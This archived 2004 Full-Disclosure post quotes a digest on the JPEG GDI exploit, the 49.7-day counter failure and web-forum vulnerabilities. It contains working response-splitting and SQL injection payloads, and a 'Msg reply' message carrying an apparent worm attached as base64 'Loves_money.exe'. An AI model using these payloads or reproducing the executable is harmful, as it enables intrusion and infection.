Full Disclosure mailing list archives

RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs

From: "Todd Towles" <toddtowles () brookshires com>
Date: Tue, 28 Sep 2004 11:41:48 -0500

It is possible to view a JPEG in a unpatched IE and it will automatic
install programs.

This is my understanding.  

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of milw0rm
Inc.
Sent: Monday, September 27, 2004 1:12 PM
To: full-disclosure () lists netsys com
Subject: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20
msgs

JPEG GDI problem,

Isn't this problem only capable of running if the jpeg was opened via
the users actions?

Is it possible that webpages could be effected with jpegs with
internet explorer viewing them?  I wouldn't think so since what I have
read from multiple peoples articles that it isn't this kind of bug.

Info needed.

Regards,
str0ke


On Mon, 27 Sep 2004 12:00:05 -0400,
full-disclosure-request () lists netsys com
<full-disclosure-request () lists netsys com> wrote:

Send Full-Disclosure mailing list submissions to
        full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
        http://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists netsys com

You can reach the person managing the list at
        full-disclosure-admin () lists netsys com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."

Today's Topics:

   1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x

repeat 9/11 (Exibar)

   2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
       repeat 9/11 (Ron DuFresne)
   3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
   4. SANS GDIscan (bashis)
   5. HTTP Response Splitting and SQL injection in megabbs forum

(pigrelax)

   6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
   7. Re: HTTP Response Splitting and SQL injection in megabbs forum

(PD9 Software)

   8. Re: Re: HTTP Response Splitting and SQL injection in megabbs

forum (DanB UK)

   9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
  10. Re: Windoze almost managed to 200x repeat 9/11 (Barry

Fitzgerald)

  11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
  12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
  13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
  14. Re: Msg reply (Elvi)
  15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows

in

       libXpm (Thierry Carrez)
  16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and

stack overflows in

       libXpm (Thierry Carrez)
  17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise

(debian-security-announce () lists debian org)


--__--__--

Message: 1
From: "Exibar" <exibar () thelair com>
To: "ASB" <abaker () gmail com>, <full-disclosure () lists netsys com>
Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to

200x repeat 9/11

Date: Sun, 26 Sep 2004 12:15:26 -0400

Exactly.  Some idiot decided to program the entire system to shut down

after

49 days.  What an idiot, why not just setup a maintenance program to

perform

a scheduled re-boot of the system instead of having an automated

proecess

shut down the system and then have to schedule a work around for this

by

scheduling a manual boot every 30 days (which someone forgot).

  This whole thing wasn't Windows' fault, but an idiot
programmer/manager/whatever fault.

  Exibar

-----Original Message-----
From: ASB [mailto:abaker () gmail com]
Sent: Sunday, September 26, 2004 10:56 AM
To: full-disclosure () lists netsys com
Subject: [inbox] Re: [Full-disclosure] Windoze almost managed to

200x

repeat 9/11


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.


-ASB

On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald
<bkfsec () sdf lonestar org> wrote:

ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Where issues like this relate to the OS is in the fact that the

OS

itself shouldn't be brought down by a poorly designed app.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

And where in that article did you read that the OS was brought

down by

a poorly designed app?

I didn't... I was reponding to a point that was made about

applications

being reponsible for system failures.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Was it MS Windows that actually held the code that brought

the system down?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The article was pretty clear:

<snip>

How you managed to read "OS failure" into this is rather

astounding...

How you manage to get up in the morning is rather astounding.

Next time, please read the thread in context.

Also, if you think that that's a detailed assessment of the

problem,

you're not too bright.

So try and think a little harder next time, and not be so

abbrassive.

You may be having a bad day (most likely due to your poor

attitude) but

don't take your own misunderstanding out on others, mmkay?

            -Barry


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


--__--__--

Message: 2
Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
From: Ron DuFresne <dufresne () winternet com>
To: Exibar <exibar () thelair com>
cc: ASB <abaker () gmail com>, <full-disclosure () lists netsys com>
Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to

200x

 repeat 9/11

On Sun, 26 Sep 2004, Exibar wrote:

Exactly.  Some idiot decided to program the entire system to shut

down after

49 days.  What an idiot, why not just setup a maintenance program to

perform

a scheduled re-boot of the system instead of having an automated

proecess

shut down the system and then have to schedule a work around for

this by

scheduling a manual boot every 30 days (which someone forgot).


Which, likely in this case, would have to somehow be monitored, seems

to

be a pretty critical application, one in which lives are dependant,

and it

is entirely possible the system might not recover from a reboot.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

--__--__--

Message: 3
From: "RandallM" <randallm () fidmail com>
To: <full-disclosure () lists netsys com>
Date: Sun, 26 Sep 2004 12:02:20 -0500
Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope?

What exactly would one gain by creating a PoC on this exploit?
How exactly does this compare to meaningful disclosures that were
revealed because someone would not listen or ignored the warnings
of their security vulnerability.

I mean, this is nothing like a program goof that allows clear-text
Passwords or exposes files or the like. This exploit (if it can be
called that) took a lot of thought to create it and exploit it.

Correct me if I'm wrong but it does not fall in to the category
of "exploit" as defined by this list. This was truly a "created

Exploit"

that would not be their otherwise. This took intelligent input.

This is nothing more then a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.

<|>-- __--__--
<|>
<|>Message: 13
<|>From: "i.t " <fulldis () it97 dyndns org>
<|>Organization: i.t consulting
<|>To: full-disclosure () lists netsys com
<|>Date: Sun, 26 Sep 2004 11:57:33 +0200
<|>Subject: [Full-disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
<|>
<|>
<|>> On Saturday 25 September 2004 16:59, raza wrote:
<|>> > I just compiled this and it works well..
<|>> >
<|> ...
<|>> yes and it works very well.
<|>> > I can see this ones gaana be fun...
<|>> We'll have a worm within days.

<|>
<|>for nearly all of my clients using win xp I've deinstalled
<|>win messenger.
<|>one urgently wanted it back for communicating in real-time;
<|>and, of course,
<|>it's much more fun seeing a live picture of the
<|>counterpart(s) in the chat
<|>window...
<|>
<|>even having installed sp2 and the newest patches plus AV I
<|>can imagine a virus
<|>spreading within those pictures throughout the whole msn and so

on...

<|>any other defense?
<|>or ist this too much paranoia?
<|>
<|>i.t
<|>
<|>
<|>-- __--__--

--__--__--

Message: 4
To: full-disclosure () lists netsys com
Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
From: bashis <mcw () wcd se>
Reply-To: mcw () wcd se
Subject: [Full-disclosure] SANS GDIscan

Hi

I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable

DLL's after

installing all availible patches from M$..

WinXP Pro SP1
C:\WINDOWS\system32\gdiplus.dll
   Version: 5.1.3097.0 <-- Vulnerable version

Win2k Server SP4
C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
   Version: 5.1.3097.0 <-- Vulnerable version

[1]
http://isc.sans.org/gdiscan.php

Have a nice day
/bashis

--__--__--

Message: 5
From: "pigrelax" <pigrelax () yandex ru>
To: <full-disclosure () lists netsys com>
Cc: <bugtraq () Securityfocus com>, <info () pd9soft com>
Date:   Sun, 26 Sep 2004 21:56:44 +0400
Subject: [Full-disclosure] HTTP Response Splitting and SQL injection

in megabbs forum


URL: http://www.pd9soft.com
Tested megabbs 2.1

1. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fi
d=%0

d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type
:%20

text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20
Maxp

atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>

Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>

2. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-
Leng

th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d
%0aC

ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/htm
l%3e

%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>

Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>

3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'

MaxPatrol is a professional network security scanner distinguished by

its

uncompromisingly high quality of scanning, optimized for effective use

by

companies of any size (serving from a few to tens of thousands of

nodes).

MaxPatrol developers were able quite simply to "ignore" about 40% of

the

newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com

--__--__--

Message: 6
From: "pigrelax" <pigrelax () yandex ru>
To: <full-disclosure () lists netsys com>
Cc: <bugtraq () Securityfocus com>
Date:   Mon, 27 Sep 2004 00:09:32 +0400
Subject: [Full-disclosure] SQL injection in BroadBoard Instant ASP

Message Board


BroadBoard Instant ASP Message Board

URL: http://www.broadboard.com/

1. software does not properly validate user-supplied input in the

'keywords'

parameter  in search.asp:
http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL
code]&method=1&method=1&body=1&subject=1&board=1&results=1

2. software does not properly validate user-supplied input in the

'handle'

parameter  in profile.asp:
http://broadboard/forum/profile.asp?handle=['SQL code]

3. software does not properly validate user-supplied input in the
'txtUserHandle' parameter  in reg2.asp:

POST /forum/reg2.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

txtNameFirst=1&txtNameLast=1&txtUserEmail=sales () maxpatrol com&txtUserHan
dle=

['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1

4. software does not properly validate user-supplied input in the
'txtUserEmail' parameter  in forgot.asp:

POST /forum/forgot.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
txtUserEmail=['SQL code]&cmdSend=1

MaxPatrol is a professional network security scanner distinguished by

its

uncompromisingly high quality of scanning, optimized for effective use

by

companies of any size (serving from a few to tens of thousands of

nodes).

MaxPatrol developers were able quite simply to "ignore" about 40% of

the

newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com

--__--__--

Message: 7
Date: Sun, 26 Sep 2004 13:50:50 -0500
From: PD9 Software <info () pd9soft com>
CC: full-disclosure () lists netsys com, bugtraq () Securityfocus com
Subject: [Full-disclosure] Re: HTTP Response Splitting and SQL

injection in megabbs forum


pigrelax wrote:

URL: http://www.pd9soft.com
Tested megabbs 2.1

1. HTTP Response Splitting
2. HTTP Response Splitting
3. More and more SQL injection:


All three issues have been addressed, and updates have been posted at
http://www.pd9soft.com/. Thank you for bringing them to my attention.

However in the future, would it be too much to ask that I am contacted
first?  I am very eager to fix any security vulnerabilities, but

sipping

coffee on a lazy Sunday afternoon and seeing this broadcast to a

public

list is a little disconcerting.

Thanks,
Matt Summers
PD9 Software, Inc

--__--__--

Message: 8
Date: Sun, 26 Sep 2004 23:12:42 +0100
From: DanB UK <danbuk () gmail com>
Reply-To: DanB UK <danbuk () gmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Re: HTTP Response Splitting and SQL

injection in megabbs forum


It seems like the OP was actually just trying to advertise their(or
affiliates) product.
I would say that its not the 'done' thing.

However in the future, would it be too much to ask that I am

contacted

first?  I am very eager to fix any security vulnerabilities, but

sipping

coffee on a lazy Sunday afternoon and seeing this broadcast to a

public

list is a little disconcerting.

I understand your concern.

Regards,
Daniel
--
DanB UK
London, UK

--__--__--

Message: 9
From: "joe" <mvp () joeware net>
To: "'devis'" <devis () easynix net>
Cc: <full-disclosure () lists netsys com>
Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat

9/11

Date: Sun, 26 Sep 2004 18:42:29 -0400

I get paid nothing to hang out on this list. In fact many of my

friends feel

I am wasting considerable time here because the vast majority of the

people

are Linux bigots simply holding each others', ummm, hands.

Once in a while though some seriously good information or conversation
occurs here which is why I like to hang out and most of my responses

tend to

be offlist. Occasionally I like to dampen some of the occasional this

or

that about how bad Windows sucks from people who don't know enough

about how

it works to even have a very good opinion. They are intelligent people
mostly, they just have a hamster up their bum about billg or MS for

some

reason.

It is funny to me how this thread came onto the list as a "Windows

sucks"

thread when it should have been a serious, "some programmers don't
understand data types sucks" thread. It is poor programming habits

like this

that cause a great deal of the flaws in apps and OSes that others take
advantage of. Programmers need to understand the proper way to handle

the

datatypes they use in their applications, whether it be checking for

data

size constraints or data range constraints.

As for missing out on cash or something from MS, I am not so sure MS

would

have me as an employee at the moment as I spend considerable time

banging on

them and their OS and choices. I don't do it out in the public lists

like

this as I am trying to be a rightous d00d to all of you cool people. I

bang

on them in the private groups that have MS people seriously looking to

make

things better.

For this specific thread, my main point is that someone who can't

figure out

that an unsigned integer value that is incrementing will roll at some

point

is a dangerous programmer no matter what OS they are on. This has

nothing to

do with Windows or any OS. It is how computers work period. There

isn't a

single OS out there that you could constantly increment a 32 bit

unsigned

counter and not roll to zero. This is way below anything the OS can

control.

At best it halts the program as soon as the overflow kicks. That

really

wouldn't help much except possibly with data corruption. I don't think

an OS

should protecting apps from data corruption due to the app losing

count

though.

  joe

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of devis
Sent: Saturday, September 25, 2004 12:49 PM
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat

9/11


Joe dude, how much u are getting from M$ a month to hang around this

list ?

Zero ? Noway....send em a letter now dude.
And please don't serve me,  'just being objective crap', you HAVE to

be

interested to defend it that well., if not, well,  you may be missing

on

something...

joe wrote:

Definitely some interesting theories Ron.

1> the code was better done under the original OS, unix


While possible, nothing actually points at this as being the case.
Anyway, I would be curious as to the functionality of the system when
it was first launched on UNIX versus the end-result. Put this on
Windows and run it 10 years and then port to UNIX or *nix and there
will almost certainly be screwups there as well. In fact, I would be
pretty confident. I have dealt with poor ports to and from Windows

and

*nix. I have even dealt with bad ports from Mainframes to UNIX where
the whole time the Mainframe people were saying the same types of
things about UNIX that you like to say about Windows. Being a good
coder for one OS doesn't make you one for all Oses when dealing with

system

level components and interfaces.

2> considering "how often" you seems to run into this same
issue with other coders in the windows realm, windows coders tend to
be especially lazy/clueless as compared to coders in other OS'


I would expect the issue is the same as always. Sheer volume. There

are

good and bad coders period. Microsoft has surely drawn more poor

coders

than any other OS with its pushing of the RAD/simple coding

environment

such as VB.

Additionally the Windows environment as a whole has more

inexperienced

users and admins and people likely to try and code. There are also

many

good ones as well, they are just well buried in the poor ones.

3> tools to code with in the windows realm are not as
3> developed/functional
as they are in other envs


I would say this opinion is uninformed.

4> M$ does not properly provide developers with clued information

with

which to do their jobs


This is another opinion which I would call rather uninformed.

Even if there was poor function documentation, if you have a

function,

any function returning a constantly increasing counter you know, as a
skilled programmer, that eventually it has to do something other than
increase. If the value is signed the sign bit will flip or if it is
unsigned it will roll to 0. How can a good programmer think any other
thing? The compiler could have inserted exception handling code but

at

best that is simply going to bounce the program out of a normal

running

state. That is a compiler thing though, not an OS thing. I do hope

you

aren't trying to tell me that UNIX can magically and infinitely
maintain a counter on a variable with a fixed bit size. I try to

consider

you to be a bit more intelligent than that.




To put it in anotehr way, if you have a set of tires on a car that

are

rated for 75 MPH (say off road truck tires) and some person goes 90

and

the tires fly apart or the vehicle flips or both, is the issue the
driver, the vehicle manufacturer, the tire manufacturer, or the tree
that produced the rubber for the tire? This is the same sort of case.
You have it in your mind ahead of time who you want to be at fault
because you have a bug up your bum about it and work to prove that

stance.


Poor coding is a result of poor coders. I have seen amazingly bad

code

on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to
Windows to DOS to VMS. I have also seen some amazingly good stuff on
the same platforms. Someone who doesn't understand basic data types

and

how to handle their limits is going to do a shitty job on all of the

platforms.


Is the ratio of good admins to bad admins better in UNIX versus

Windows?

Absolutely. Is the ratio of good programmers to bad programmers

better

in UNIX versus Windows? Most certainly. Does this mean all Windows
admins are bad admins, obviously not. Does this mean all Windows
programmers are bad programmers, obviously not. I specifically say

UNIX

versus *nix because I think *nix is one or more steps closer to

Windows

in this discussion and getting closer as its popularity grows with
Windows users. Switching to *nix doesn't make the admins or coders
switching (or just using in tandem) any better simply because they

switched.








-----Original Message-----
From: Ron DuFresne [mailto:dufresne () winternet com]
Sent: Friday, September 24, 2004 11:25 PM
To: joe
Cc: mcw () wcd se; full-disclosure () lists netsys com
Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat
9/11

On Fri, 24 Sep 2004, joe wrote:

Again, there are valid uses of GetTickCount and there are safe ways

of

doing so. If there is concern, I do recommend testing functionality
associated with each of the DLLs. You might find a bug you can

report

for

kudos.

On the incident, I would guess the vendor never had a clue it would

do

that.

That function can't return more than 49.7 days without breaking

every

app that currently uses it. MS can not do that. That is why there is
another function to get the info with a different datatype. See my
other

posts.



What seems to read clearly from your replies to this thread is that
either;

1> the code was better done under the original OS, unix

2> considering "how often" you seems to run into this same issue with
other coders in the windows realm, windows coders tend to be

especially

lazy/clueless as compared to coders in other OS'

3> tools to code with in the windows realm are not as
3> developed/functional
as they are in other envs

4> M$ does not properly provide developers with clued information

with

which to do their jobs

From which you can combine any or all of the above for a correct

interpretation of the total of your replies.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
      ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 10
Date: Sun, 26 Sep 2004 20:41:34 -0400
From: Barry Fitzgerald <bkfsec () sdf lonestar org>
To: ASB <abaker () gmail com>
CC: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat

9/11


ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.


Oversimplification is for the foolish.  Like I said, you're not too

bright.


You're showing very little understanding of system architecture here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for issues
and for them not being OS issues.  My point was that it's not always
clear cut.

I was not trying to say that this case was an OS issue.  I was trying

to

say that the line is not always black and white.  I was also pointing
out that none of us know because the only information we have to go on
is third-hand and imprecise.  If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?  Go
solve the world's problems or something.  of course, you can't so

you've

decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what

I've

said (which, you won't, because I'm right) then I'm willing to hear
them.  Other than that, you're just wasting everyone's time by trying

to

railroad points that you don't understand.

       -Barry

--__--__--

Message: 11
From: "Vince Able" <we_hate_vince () hotmail com>
To: <full-disclosure () lists netsys com>
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat

9/11

Date: Sun, 26 Sep 2004 21:24:27 -0400
Organization: The Ram Group

Well what a nice first post to read entering Full-Disclosure. LoL
----- Original Message -----
From: "Barry Fitzgerald" <bkfsec () sdf lonestar org>
To: "ASB" <abaker () gmail com>
Cc: <full-disclosure () lists netsys com>
Sent: Sunday, September 26, 2004 8:41 PM
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat

9/11

ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.


Oversimplification is for the foolish.  Like I said, you're not too

bright.


You're showing very little understanding of system architecture

here.

My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for

issues

and for them not being OS issues.  My point was that it's not always
clear cut.

I was not trying to say that this case was an OS issue.  I was

trying to

say that the line is not always black and white.  I was also

pointing

out that none of us know because the only information we have to go

on

is third-hand and imprecise.  If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?

Go

solve the world's problems or something.  of course, you can't so

you've

decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what

I've

said (which, you won't, because I'm right) then I'm willing to hear
them.  Other than that, you're just wasting everyone's time by

trying to

railroad points that you don't understand.

       -Barry




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


--__--__--

Message: 12
Date: Sun, 26 Sep 2004 22:36:12 -0400
From: ASB <abaker () gmail com>
Reply-To: ASB <abaker () gmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat

9/11


There was more than enough information provided in the initial link,
besides what was available to those who took a moment or 3 to search
for additional info, to avoid coming to the conclusion that the OS was
the fault here.

The mere fact that thousands, if not millions of people manage to run
Windows 2000 systems which do not keel over every 49.7 days, would
tend to cause one to look elsewhere for the source of the issue.
Beyond that, the wording of the various articles on this issue that I
looked at, made it rather obvious that there was an issue with the
APPLICATION which rendered it useless if certain operator steps were
not performed. No matter how scanty you feel the articles were, they
never even implied that the OS was inoperable during any of this.

While it is certainly important to have as much information as
possible before rendering verdicts of any sort, and while not every
issue can be definitively outlined as jet black or lily white, there's
not a whole lot more forensics that's needed to conclude that the root
of the issue is one of application development, compounded by the
failure of an operator to perform a prescribed workaround at the
appointed time.

The irony here is that you're accusing me of not reading or

comprehending.


-ASB

On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald
<bkfsec () sdf lonestar org> wrote:

ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.


Oversimplification is for the foolish.  Like I said, you're not too

bright.


You're showing very little understanding of system architecture

here.

My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for

issues

and for them not being OS issues.  My point was that it's not always
clear cut.

I was not trying to say that this case was an OS issue.  I was

trying to

say that the line is not always black and white.  I was also

pointing

out that none of us know because the only information we have to go

on

is third-hand and imprecise.  If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?

Go

solve the world's problems or something.  of course, you can't so

you've

decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what

I've

said (which, you won't, because I'm right) then I'm willing to hear
them.  Other than that, you're just wasting everyone's time by

trying to

railroad points that you don't understand.

      -Barry


--__--__--

Message: 13
Date: Sun, 26 Sep 2004 22:20:29 -0700
From: r00t3d <r00t3d () gmail com>
Reply-To: r00t3d <r00t3d () gmail com>
To: randallm () fidmail com, full-disclosure () lists netsys com
Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope?

Dear RandallM,

This exploit (if it can becalled that) took a lot of thought to

create it and exploit it.

Yea, lots of thought, and ripped shellcode to boot! Can't beat that

can ya?

Correct me if I'm wrong but it does not fall in to the category
of "exploit" as defined by this list.


Okay, you're wrong.

This was truly a "created Exploit"


Seriously? I didn't know exploits were "created" I always thought they
just appeared.

This is nothing more then a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.

Uh oh, are the blaqhats after us again?? I think we had all better
just pull our whitehats down over our heads and hope they go away. I
hear, if you don't move, the blaqhats won't notice you and will leave,
kind of like with bears. Anyways, last time I checked, it was't
blaqhats that disclosed exploits, it was whitehats and scene whores.

  Love,
   #MSNetworks

--__--__--

Message: 14
Date: Mon, 27 Sep 2004 09:03:35 +0200
To: "Full-disclosure" <full-disclosure () lists netsys com>
From: "Elvi" <elvi52001 () yahoo com>
Subject: [Full-disclosure] Re: Msg reply

----------tthzhwewredcturxosqp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><body>

<br>
</body></html>

----------tthzhwewredcturxosqp
Content-Type: application/octet-stream; name="Loves_money.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Loves_money.exe"

TVoAAAEAAAACAAAA//8AAEAAAAAAAAAAQAAAAAAAAAC0TM0hAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAkAAAAKkm3RPtR7NA7UezQO1Hs0DtR7NA7kezQGNYoEBtR7NAEWehQOxHs0AqQbVA

7EezQFJpY2jtR7NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwDMD5BAAAAAAAAA

AADgAA8BCwEFDABQAAAAEAAAAJAAAPDiAAAAoAAAAPAAAAAAQAAAEAAAAAIAAAQAAAAAAAAA

BAAAAAAAAAAAAAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA

AACk8wAATAIAAADwAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAABVUFgwAAAAAACQAAAAEAAAAAAAAAACAAAAAAAAAAAAAAAAAACAAADg

VVBYMQAAAAAAUAAAAKAAAABGAAAAAgAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADw

AAAABgAAAEgAAAAAAAAAAAAAAAAAAEAAAMAxLjI0AFVQWCEMCQIIvyc9X9rQb57HxwAAyUIA

AACSAAAmAADM////m/rJOnEqKxiQ86MrEIn8ewjaeUIXGA5z7n9eUr/9//+6+gQ6jxg5r3EW

rHG/8nGP9nG36hniLTsQ8sj83P+x3d8FO3H+Jsk4vBgSpDM49vora+237yoNKgWP6gL2qhI6

BQANGX/79gd5Pg6S+to1kPoSYTT6c78GPb//vsW+DoKQATDyEi26DXe/Aqr/m697KRIGFVN5

hwL6j/gR6QWPd2/ukQIOEmpbQw4RNQ8SqrrbNnNgRmqHDnf+arf23GbiWVqlyOxH8vi32d7f

if4ZkP6SFqS9Bf8Lve3BtqrLB8koDUdoJu72rdw1rQZx/PY7E/hACVEJ7z6y/Xkb+QlQpR7y

qXGn9iGQ4BJj8pT9d0l5OpsGULGPC6Ef8BKDe+cWMsqxuPsSSsWpyq11f/E6jvSqkJQlDLso

xH8WusGDrEWPhIfJIRmuw5ft/1Y7Gup5A/uO8VacCfL4jvtWmgd5e3gS6BLHmDgJ9hLJ/BJv

7d2R0xLYBrl5AehIQpxC9wit/f/wnFF5E/mDSA0j0QNKx9CRxP////95GsXGxInoxs6J8P67

xqGI9f78EfH+BhH91sQ6Gvj+6x7aw9FQSamQaSShf7N9Q4d7yXEi4CIGYTMFCFR63/Z7u76O

47ISdMTTj/1Zoe1znTFz//x5PP4RIEL7iBIYBnaFn9vekvgVU3AEJE29vS72dxeEQ/oTcu7A

BDgYAxJi1vht4zy/BHEzwHD+wXK/hQ2y7e62CMsF9UyvCcByFXDs24W3BcC7wSiI+CgEOY8v

2LcX3NlqArmP8nD5PAdwbMQW2rn7BdwBV4wC/rX24+S6BBtPA+7Ccq9t79vdY68GDQZwDAQX

